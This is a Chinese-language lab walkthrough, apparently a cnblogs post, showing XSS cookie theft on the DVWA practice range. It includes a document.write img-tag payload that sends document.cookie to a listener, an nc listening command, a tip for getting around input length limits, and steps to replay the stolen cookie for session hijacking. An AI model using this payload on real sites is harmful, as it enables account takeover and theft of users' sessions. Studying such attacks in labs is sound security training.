环境
系统:windows 7
靶场:DVWA
场景:chrome对firefox的个人cookie盗用伪造
IP:192.168.98.128
端口:未占用的任意端口
实施
1.首先确保firefox登录状态,即存在cookie
2.构造获取cookie的js请求脚本
<script> document.write( '<img src="url'+ document.cookie+ '"/>' //利用img标签特性,生成src的GET请求并获取请求页面cookie,然后作为图片去展示; ); //通过document.write写到网页中来-执行img标签-去触发指令-生成一个含cookie的GET请求 </script> //因为src=“”中引号内容只会作为数据字符串进行展示,所以需引进script脚本去执行document.cookie。对标签和执行内容进行‘单引号’分隔和【数据+指令+数据】的拼接
原理:构造一个访问请求来盗取浏览器页面的cookie
3.提交执行脚本
在任意输入框进行提交,注意绕过前端输入长度限制
4.进行nc端口监听
nc -lp 8011
注:此处须保持与构造请求的端口一致!!
5.替换cookie实现伪造盗用
- 1.打开chrome浏览器访问DVWA
- 2.找到页面cookie信息
- 3.进行cookie值的替换
6.实现登录
此处并不是直接刷新页面,因为其登录页面是固定的,我们要通过cookie的盗用直接获取其登录状态,因此此处访问的应该是首页
http://127.0.0.1:8082
可以看到成功进入DVWA的页面,攻击完成。
TRANSLATE with x English TRANSLATE with COPY THE URL BELOW Back EMBED THE SNIPPET BELOW IN YOUR SITE Enable collaborative features and customize widget: Bing Webmaster Portal Back 标签:XSS,请求,端口,cookie,location,document,伪造,页面 From: https://www.cnblogs.com/Wizo-WLsecTeam/p/17477437.html